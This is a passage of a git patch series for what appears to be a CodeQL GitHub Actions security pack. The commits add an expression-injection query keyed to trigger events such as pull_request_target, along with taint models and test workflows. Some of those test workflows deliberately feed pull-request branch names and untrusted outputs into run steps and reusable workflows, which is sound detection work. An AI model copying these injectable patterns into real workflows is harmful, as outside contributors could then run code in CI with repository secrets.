getInputExpr() { result = input } } +/** + * A call to a data flow callable (Uses). + */ +class CallNode extends ExprNode { + private DataFlowCall call; + + CallNode() { this.getCfgNode() instanceof DataFlowCall } + + string getCallee() { result = this.getCfgNode().(DataFlowCall).getName() } +} + /** * An argument to a Uses step (call). */ diff --git a/ql/lib/ext/TEST-RW-MODELS.model.yml b/ql/lib/ext/TEST-RW-MODELS.model.yml new file mode 100644 index 00000000000..7adbcd5adbd --- /dev/null +++ b/ql/lib/ext/TEST-RW-MODELS.model.yml @@ -0,0 +1,17 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["octo-org/this-repo/.github/workflows/workflow.yml", "*", "input.config-path", "output.workflow-output", "taint"] + - ["octo-org/summary-repo/.github/workflows/workflow.yml", "*", "input.config-path", "output.workflow-output", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["octo-org/source-repo/.github/workflows/workflow.yml", "*", "output.workflow-output", "*", "Foo"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["octo-org/sink-repo/.github/workflows/workflow.yml", "*", "input.config-path", "expression-injection"] diff --git a/ql/lib/test/test.ql b/ql/lib/test/test.ql index 4b2be43bbda..168987284c3 100644 --- a/ql/lib/test/test.ql +++ b/ql/lib/test/test.ql @@ -43,14 +43,9 @@ query predicate nonOrphanVarAccesses(ExprAccessExpr va, string var, AstNode pare query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode() = parent } -query predicate cfgNodes(Cfg::Node n) { - //any() - n.getAstNode() instanceof OutputsStmt -} +query predicate cfgNodes(Cfg::Node n) { any() } -query predicate dfNodes(DataFlow::Node e) { - e.getLocation().getFile().getBaseName() = "argus_case_study.yml" -} +query predicate dfNodes(DataFlow::Node e) { any() } query predicate exprNodes(DataFlow::ExprNode e) { any() } @@ -69,3 +64,7 @@ query predicate sources(string action, string version, string output, string tri query predicate summaries(string action, string version, string input, string output, string kind) { summaryModel(action, version, input, output, kind) } + +query predicate calls(DataFlow::CallNode call, string callee) { callee = call.getCallee() } + +query predicate needs(DataFlow::ExprNode e) { e.asExpr() instanceof NeedsCtxAccessExpr } diff --git a/ql/src/test/.github/workflows/calling_workflow.yml b/ql/src/test/.github/workflows/calling_workflow.yml index 9aafe1189ef..7c2bfdf0348 100644 --- a/ql/src/test/.github/workflows/calling_workflow.yml +++ b/ql/src/test/.github/workflows/calling_workflow.yml @@ -8,17 +8,20 @@ jobs: uses: octo-org/this-repo/.github/workflows/reusable_workflow.yml@172239021f7ba04fe7327647b213799853a9eb89 with: config-path: ${{ github.event.pull_request.head.ref }} - secrets: inherit call2: uses: ./.github/workflows/reusable_workflow.yml with: config-path: ${{ github.event.pull_request.head.ref }} - secrets: inherit call3: - uses: octo-org/another-repo/.github/workflows/workflow.yml@v1 + uses: octo-org/summary-repo/.github/workflows/workflow.yml@v1 + with: + config-path: ${{ github.event.pull_request.head.ref }} + call4: + uses: octo-org/source-repo/.github/workflows/workflow.yml@v1 + call5: + uses: octo-org/sink-repo/.github/workflows/workflow.yml@v1 with: config-path: ${{ github.event.pull_request.head.ref }} - secrets: inherit job1: runs-on: ubuntu-latest @@ -36,3 +39,8 @@ jobs: needs: call3 steps: - run: echo ${{ needs.call3.outputs.workflow-output }} + job4: + runs-on: ubuntu-latest + needs: call4 + steps: + - run: echo ${{ needs.call4.outputs.workflow-output }} From a2210dca79e5bbd4bda0b1bbe3d965c58facfdc2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 20 Feb 2024 21:48:29 +0100 Subject: [PATCH 0061/1267] feat(triggers): Add getEnclosingWorkflowStmt to Statement class --- ql/lib/codeql/actions/Ast.qll | 22 ++++++--- .../CWE-094/CriticalExpressionInjection.ql | 47 +++++++++++++++++++ .../Security/CWE-094/ExpressionInjection.ql | 2 +- ql/src/test/.github/workflows/simple2.yml | 5 +- 4 files changed, 64 insertions(+), 12 deletions(-) create mode 100644 ql/src/Security/CWE-094/CriticalExpressionInjection.ql diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 605f658b263..5037a55d632 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -20,7 +20,10 @@ class AstNode instanceof YamlNode { * A statement is a group of expressions and/or statements that you design to carry out a task or an action. * Any statement that can return a value is automatically qualified to be used as an expression. */ -class Statement extends AstNode { } +class Statement extends AstNode { + /** Gets the workflow that this job is a part of. */ + WorkflowStmt getEnclosingWorkflowStmt() { exists(WorkflowStmt w | w.getAChildNode*() = result) } +} /** * An expression is any word or group of words or symbols that is a value. In programming, an expression is a value, or anything that executes and ends up being a value. @@ -53,6 +56,14 @@ class WorkflowStmt extends Statement instanceof Actions::Workflow { JobStmt getAJobStmt() { result = super.getJob(_) } JobStmt getJobStmt(string id) { result = super.getJob(id) } + + predicate hasTriggerEvent(string trigger) { + exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(trigger)) + } + + string getATriggerEvent() { + exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(result)) + } } class ReusableWorkflowStmt extends WorkflowStmt { @@ -122,9 +133,6 @@ class JobStmt extends Statement instanceof Actions::Job { */ string getId() { result = super.getId() } - /** Gets the workflow that this job is a part of. */ - WorkflowStmt getWorkflowStmt() { result = super.getWorkflow() } - /** Gets the step at the given index within this job. */ StepStmt getStepStmt(int index) { result = super.getStep(index) } @@ -222,7 +230,7 @@ class StepUsesExpr extends StepStmt, UsesExpr { ) or exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) ) } @@ -287,7 +295,7 @@ class JobUsesExpr extends UsesExpr instanceof YamlMapping { ) or exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) ) } @@ -320,7 +328,7 @@ class RunExpr extends StepStmt, Expression { ) or exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) ) } diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql new file mode 100644 index 00000000000..624bd32e45c --- /dev/null +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql @@ -0,0 +1,47 @@ +/** + * @name Expression injection in Actions + * @description Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious + * user to inject code into the GitHub action. + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision high + * @id actions/critical-expression-injection + * @tags actions + * security + * external/cwe/cwe-094 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class ExpressionInjectionSink extends DataFlow::Node { + ExpressionInjectionSink() { + exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + externallyDefinedSink(this, "expression-injection") + } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source + .getNode() + .asExpr() + .(Statement) + .getEnclosingWorkflowStmt() + .hasTriggerEvent("pull_request_target") +select sink.getNode(), source, sink, + "Potential expression injection, which may be controlled by an external user." diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 99779d6cc90..c34fcb74bbc 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -4,7 +4,7 @@ * user to inject code into the GitHub action. * @kind path-problem * @problem.severity warning - * @security-severity 9.3 + * @security-severity 5.0 * @precision high * @id actions/expression-injection * @tags actions diff --git a/ql/src/test/.github/workflows/simple2.yml b/ql/src/test/.github/workflows/simple2.yml index b40f5eb6ac0..8271f93d857 100644 --- a/ql/src/test/.github/workflows/simple2.yml +++ b/ql/src/test/.github/workflows/simple2.yml @@ -1,9 +1,6 @@ name: CI -on: - pull_request: - branches: - - main +on: [pull_request_target, pull_request] jobs: changed_files: From 3814462266e9482cc9686f60257006f45f8165bc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 21 Feb 2024 10:23:37 +0100 Subject: [PATCH 0062/1267] feat(triggers): New query for critical issues Adds a new query and the required changes to be able to account for the trigger events so that we dont report issues if they are not likely exploitable. --- ql/lib/codeql/actions/Ast.qll | 4 +- .../codeql/actions/dataflow/ExternalFlow.qll | 6 ++- .../codeql/actions/dataflow/FlowSources.qll | 38 ++++++++++++++----- .../dataflow/internal/DataFlowPrivate.qll | 4 +- ...ahmadnassri_action-changed-files.model.yml | 2 - ql/lib/ext/dorny_paths-filter.model.yml | 1 - .../ext/jitterbit_get-changed-files.model.yml | 7 ---- ql/lib/ext/tj-actions_branch-names.model.yml | 11 ++++++ ql/lib/ext/tj-actions_changed-files.model.yml | 17 --------- .../tj-actions_verify-changed-files.model.yml | 1 - .../CWE-094/CriticalExpressionInjection.ql | 2 +- 11 files changed, 50 insertions(+), 43 deletions(-) create mode 100644 ql/lib/ext/tj-actions_branch-names.model.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 5037a55d632..2e93187b6bf 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -22,7 +22,9 @@ class AstNode instanceof YamlNode { */ class Statement extends AstNode { /** Gets the workflow that this job is a part of. */ - WorkflowStmt getEnclosingWorkflowStmt() { exists(WorkflowStmt w | w.getAChildNode*() = result) } + WorkflowStmt getEnclosingWorkflowStmt() { + exists(WorkflowStmt w | w.getAChildNode*() = this and result = w) + } } /** diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 6446fbb5572..594b6017729 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -39,8 +39,10 @@ predicate sinkModel(string action, string version, string input, string kind) { Extensions::sinkModel(action, version, input, kind) } -predicate externallyDefinedSource(DataFlow::Node source, string sourceType, string fieldName) { - exists(UsesExpr uses, string action, string version, string trigger, string kind | +predicate externallyDefinedSource( + DataFlow::Node source, string sourceType, string fieldName, string trigger +) { + exists(UsesExpr uses, string action, string version, string kind | sourceModel(action, version, fieldName, trigger, kind) and uses.getCallee() = action.toLowerCase() and ( diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 09094f2c580..0e82498bfc1 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -17,6 +17,8 @@ abstract class RemoteFlowSource extends SourceNode { /** Gets a string that describes the type of this remote flow source. */ abstract string getSourceType(); + abstract string getATriggerEvent(); + override string getThreatModel() { result = "remote" } } @@ -109,20 +111,33 @@ private predicate isExternalUserControlledWorkflowRun(string context) { } private class EventSource extends RemoteFlowSource { + string trigger; + EventSource() { exists(ExprAccessExpr e, string context | this.asExpr() = e and context = e.getExpression() | - isExternalUserControlledIssue(context) or - isExternalUserControlledPullRequest(context) or - isExternalUserControlledReview(context) or - isExternalUserControlledComment(context) or - isExternalUserControlledGollum(context) or - isExternalUserControlledCommit(context) or - isExternalUserControlledDiscussion(context) or - isExternalUserControlledWorkflowRun(context) + trigger = ["issues", "issue_comment"] and isExternalUserControlledIssue(context) + or + trigger = ["pull_request_target", "pull_request_review", "pull_request_review_comment"] and + isExternalUserControlledPullRequest(context) + or + trigger = ["pull_request_review"] and isExternalUserControlledReview(context) + or + trigger = ["pull_request_review_comment", "issue_comment", "discussion_comment"] and + isExternalUserControlledComment(context) + or + trigger = ["gollum"] and isExternalUserControlledGollum(context) + or + trigger = ["push"] and isExternalUserControlledCommit(context) + or + trigger = ["discussion", "discussion_comment"] and isExternalUserControlledDiscussion(context) + or + trigger = ["workflow_run"] and isExternalUserControlledWorkflowRun(context) ) } override string getSourceType() { result = "User-controlled events" } + + override string getATriggerEvent() { result = trigger } } /** @@ -130,10 +145,13 @@ private class EventSource extends RemoteFlowSource { */ private class ExternallyDefinedSource extends RemoteFlowSource { string sourceType; + string trigger; - ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _) } + ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _, trigger) } override string getSourceType() { result = sourceType } + + override string getATriggerEvent() { result = trigger } } /** @@ -145,4 +163,6 @@ private class CompositeActionInputSource extends RemoteFlowSource { CompositeActionInputSource() { c.getInputsStmt().getInputExpr(_) = this.asExpr() } override string getSourceType() { result = "Composite action input" } + + override string getATriggerEvent() { result = "*" } } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 89f31983189..ae99e7c9184 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -173,7 +173,7 @@ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = */ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { exists(UsesExpr astFrom, StepsCtxAccessExpr astTo | - externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName()) and + externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName(), _) and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getRefExpr() = astFrom @@ -201,7 +201,7 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and ( - externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName()) or + externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName(), _) or astTo.getRefExpr() = astFrom ) ) diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index 8f449f6b26d..34cb56a01ad 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml @@ -3,7 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["ahmadnassri/action-changed-files", "*", "output.files", "pull_request", "PR changed files"] - ["ahmadnassri/action-changed-files", "*", "output.files", "pull_request_target", "PR changed files"] - - ["ahmadnassri/action-changed-files", "*", "output.json", "pull_request", "PR changed files"] - ["ahmadnassri/action-changed-files", "*", "output.json", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/dorny_paths-filter.model.yml b/ql/lib/ext/dorny_paths-filter.model.yml index 6ee41e93826..6fefec9a4f8 100644 --- a/ql/lib/ext/dorny_paths-filter.model.yml +++ b/ql/lib/ext/dorny_paths-filter.model.yml @@ -3,5 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["dorny/paths-filter", "*", "output.changes", "pull_request", "PR changed files"] - ["dorny/paths-filter", "*", "output.changes", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml index f19a2da37f5..d7cbde25b88 100644 --- a/ql/lib/ext/jitterbit_get-changed-files.model.yml +++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml @@ -3,17 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["jitterbit/get-changed-files", "*", "output.all", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.all", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.added", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.added", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.modified", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.modified", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.removed", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.removed", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.renamed", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.renamed", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml new file mode 100644 index 00000000000..20383f415c2 --- /dev/null +++ b/ql/lib/ext/tj-actions_branch-names.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + # https://github.com/tj-actions/branch-names + - ["tj-actions/branch-names", "*", "output.base_ref_branch", "pull_request_target", "PR base branch"] + - ["tj-actions/branch-names", "*", "output.current_branch", "pull_request_target", "PR current branch"] + - ["tj-actions/branch-names", "*", "output.head_ref_branch", "pull_request_target", "PR head branch"] + - ["tj-actions/branch-names", "*", "output.ref_branch", "pull_request_target", "Branch tirggering workflow run"] + diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml index fc5557db6ea..21a0b479ef5 100644 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ b/ql/lib/ext/tj-actions_changed-files.model.yml @@ -3,37 +3,20 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tj-actions/changed-files", "*", "output.added_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.added_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.copied_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.copied_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.deleted_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.deleted_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.modified_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.renamed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.renamed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.type_changed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.type_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.unmerged_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.unmerged_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.unknown_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.unknown_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_changed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.all_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_changed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.other_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_modified_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.all_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/tj-actions_verify-changed-files.model.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml index 76d83bd249e..9b6649892af 100644 --- a/ql/lib/ext/tj-actions_verify-changed-files.model.yml +++ b/ql/lib/ext/tj-actions_verify-changed-files.model.yml @@ -3,5 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tj-actions/verify-changed-files", "*", "output.changed-files", "pull_request", "PR changed files"] - ["tj-actions/verify-changed-files", "*", "output.changed-files", "pull_request_target", "PR changed files"] diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql index 624bd32e45c..a6baf060c9d 100644 --- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql @@ -42,6 +42,6 @@ where .asExpr() .(Statement) .getEnclosingWorkflowStmt() - .hasTriggerEvent("pull_request_target") + .hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) select sink.getNode(), source, sink, "Potential expression injection, which may be controlled by an external user." From 3aa4f7f1afc911f7ef871d2b3d22daea7ae2ac41 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 20 Feb 2024 21:48:29 +0100 Subject: [PATCH 0063/1267] feat(triggers): Add getEnclosingWorkflowStmt to Statement class --- ql/lib/codeql/actions/Ast.qll | 22 ++++++--- .../CWE-094/CriticalExpressionInjection.ql | 47 +++++++++++++++++++ .../Security/CWE-094/ExpressionInjection.ql | 2 +- ql/src/test/.github/workflows/simple2.yml | 5 +- 4 files changed, 64 insertions(+), 12 deletions(-) create mode 100644 ql/src/Security/CWE-094/CriticalExpressionInjection.ql diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 605f658b263..5037a55d632 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -20,7 +20,10 @@ class AstNode instanceof YamlNode { * A statement is a group of expressions and/or statements that you design to carry out a task or an action. * Any statement that can return a value is automatically qualified to be used as an expression. */ -class Statement extends AstNode { } +class Statement extends AstNode { + /** Gets the workflow that this job is a part of. */ + WorkflowStmt getEnclosingWorkflowStmt() { exists(WorkflowStmt w | w.getAChildNode*() = result) } +} /** * An expression is any word or group of words or symbols that is a value. In programming, an expression is a value, or anything that executes and ends up being a value. @@ -53,6 +56,14 @@ class WorkflowStmt extends Statement instanceof Actions::Workflow { JobStmt getAJobStmt() { result = super.getJob(_) } JobStmt getJobStmt(string id) { result = super.getJob(id) } + + predicate hasTriggerEvent(string trigger) { + exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(trigger)) + } + + string getATriggerEvent() { + exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(result)) + } } class ReusableWorkflowStmt extends WorkflowStmt { @@ -122,9 +133,6 @@ class JobStmt extends Statement instanceof Actions::Job { */ string getId() { result = super.getId() } - /** Gets the workflow that this job is a part of. */ - WorkflowStmt getWorkflowStmt() { result = super.getWorkflow() } - /** Gets the step at the given index within this job. */ StepStmt getStepStmt(int index) { result = super.getStep(index) } @@ -222,7 +230,7 @@ class StepUsesExpr extends StepStmt, UsesExpr { ) or exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) ) } @@ -287,7 +295,7 @@ class JobUsesExpr extends UsesExpr instanceof YamlMapping { ) or exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) ) } @@ -320,7 +328,7 @@ class RunExpr extends StepStmt, Expression { ) or exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) ) } diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql new file mode 100644 index 00000000000..624bd32e45c --- /dev/null +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql @@ -0,0 +1,47 @@ +/** + * @name Expression injection in Actions + * @description Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious + * user to inject code into the GitHub action. + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision high + * @id actions/critical-expression-injection + * @tags actions + * security + * external/cwe/cwe-094 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class ExpressionInjectionSink extends DataFlow::Node { + ExpressionInjectionSink() { + exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + externallyDefinedSink(this, "expression-injection") + } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source + .getNode() + .asExpr() + .(Statement) + .getEnclosingWorkflowStmt() + .hasTriggerEvent("pull_request_target") +select sink.getNode(), source, sink, + "Potential expression injection, which may be controlled by an external user." diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 99779d6cc90..c34fcb74bbc 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -4,7 +4,7 @@ * user to inject code into the GitHub action. * @kind path-problem * @problem.severity warning - * @security-severity 9.3 + * @security-severity 5.0 * @precision high * @id actions/expression-injection * @tags actions diff --git a/ql/src/test/.github/workflows/simple2.yml b/ql/src/test/.github/workflows/simple2.yml index b40f5eb6ac0..8271f93d857 100644 --- a/ql/src/test/.github/workflows/simple2.yml +++ b/ql/src/test/.github/workflows/simple2.yml @@ -1,9 +1,6 @@ name: CI -on: - pull_request: - branches: - - main +on: [pull_request_target, pull_request] jobs: changed_files: From ea29a09fd7ea8ccc8a1c87e7b5914a54333312eb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 21 Feb 2024 10:23:37 +0100 Subject: [PATCH 0064/1267] feat(triggers): New query for critical issues Adds a new query and the required changes to be able to account for the trigger events so that we dont report issues if they are not likely exploitable. --- ql/lib/codeql/actions/Ast.qll | 4 +- .../codeql/actions/dataflow/ExternalFlow.qll | 6 ++- .../codeql/actions/dataflow/FlowSources.qll | 38 ++++++++++++++----- .../dataflow/internal/DataFlowPrivate.qll | 4 +- ...ahmadnassri_action-changed-files.model.yml | 2 - ql/lib/ext/dorny_paths-filter.model.yml | 1 - .../ext/jitterbit_get-changed-files.model.yml | 7 ---- ql/lib/ext/tj-actions_branch-names.model.yml | 11 ++++++ ql/lib/ext/tj-actions_changed-files.model.yml | 17 --------- .../tj-actions_verify-changed-files.model.yml | 1 - .../CWE-094/CriticalExpressionInjection.ql | 2 +- 11 files changed, 50 insertions(+), 43 deletions(-) create mode 100644 ql/lib/ext/tj-actions_branch-names.model.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 5037a55d632..2e93187b6bf 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -22,7 +22,9 @@ class AstNode instanceof YamlNode { */ class Statement extends AstNode { /** Gets the workflow that this job is a part of. */ - WorkflowStmt getEnclosingWorkflowStmt() { exists(WorkflowStmt w | w.getAChildNode*() = result) } + WorkflowStmt getEnclosingWorkflowStmt() { + exists(WorkflowStmt w | w.getAChildNode*() = this and result = w) + } } /** diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 6446fbb5572..594b6017729 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ 